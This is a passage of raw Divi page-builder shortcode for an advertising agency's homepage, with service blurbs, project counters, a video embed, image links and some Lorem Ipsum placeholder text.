text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"//i.ytimg.com/vi/f47r43eO6BU/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"50px||3px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" custom_padding_last_edited=\"on|phone\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.1\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||23px||false|false\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||||false|false\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Why-we.png\" alt=\"Why We creative agency\" title_text=\"Why we\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"61px|||||\" custom_margin_tablet=\"\" custom_margin_phone=\"0px||||false|false\" custom_margin_last_edited=\"on|phone\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"|auto|2px|auto||\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-w.jpg\" title_text=\"800x800 w\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x400.jpg\" title_text=\"800x400\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"4.5.2\" custom_padding=\"0px||0px|\" hover_enabled=\"0\" custom_margin=\"||||false|false\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800..1.jpg\" title_text=\"800x800..1\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800.jpg\" title_text=\"800x800\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"0px||50px||false|false\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"4.4.9\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.1\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>We have a dedicated team to build new tools and technique, to complete the day today repetitive work with precision.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Lead/Sales Generation Campaign - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Digital Advertising - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"4.5.2\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Artboard-4.png\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-12.png\" alt=\"Best Advertising agency\" title_text=\"best advertising agency\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"4.5.2\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]<p>NOBODY READS ADS, PEOPLE READ WHAT INTERESTS THEM &amp; SOMETIME IT\'S AN AD</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px||3px|||\" box_shadow_style=\"preset7\" 